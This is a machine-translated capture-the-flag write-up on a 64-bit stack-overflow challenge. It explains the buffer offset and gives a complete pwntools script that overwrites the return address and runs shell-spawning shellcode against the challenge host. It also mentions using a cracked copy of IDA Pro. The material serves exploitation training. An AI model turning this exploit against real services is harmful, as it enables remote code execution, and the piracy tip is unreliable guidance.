One 、 Stack overflow ？

In stack overflow attack technology, it is usually to control the return address of the function to a specific location to execute the code you want to execute .

Two 、 The problem solving process

1. Open topic , Download the attachment , Use file View file type

View security measures CANARY/FORTIFY/NX/PIE Basically closed

It's a 64 Bit elf file , Add executable rights

Run it , You can see that the title generates an address , And need to be in Input someting Type in payload

2.IDA Decompile

（ps：IDA stay linux The environment is too difficult to configure , My approach is to windows In the environment , Open a virtual machine , And then in windows Download the cracked version in ida pro, stay linux Do questions in the virtual machine ）
Old rules , Put it in IDA Take a look inside ：

__int64 buf; // [rsp+0h] [rbp-10h] You can know buf be relative to rbp The offset of is 0x10
So its available shellcode Space for 16+8=24 byte （ Offset + The return address ）, We have a length of 23 Of shellcode, But because it has push The directive , If we put shellcode Put it in front of the return address , In procedure leave Will destroy shellcode, So we put it in the back , namely payload The format is ：

bytes('a',encoding="utf8")*24+[buf_addr+32]+shellcode

there 32 yes 24 Bytes of padding data + The return address

3. Code

from pwn import *

context(os="linux", arch="amd64", log_level='debug')
host = 'challenge-b5fd6fdf00912e7a.sandbox.ctfhub.com'
port = 33363

p = process('./pwn')
p = connect(host,port)
p.recvuntil(b'[')
buf_addr = int(p.recvuntil(b']')[:-1].decode('utf-8'), 16) #  obtain buf Address 
shellcode_address = buf_addr+0x20
p.recv() 
shell= asm(shellcraft.sh())
p.sendline( b'a'*24 + p64(shellcode_address) + shell)
p.interactive()

summary

The basic process is to check the file information first , then ida Decompile , Then go to find the variables you want , Finally, build the code .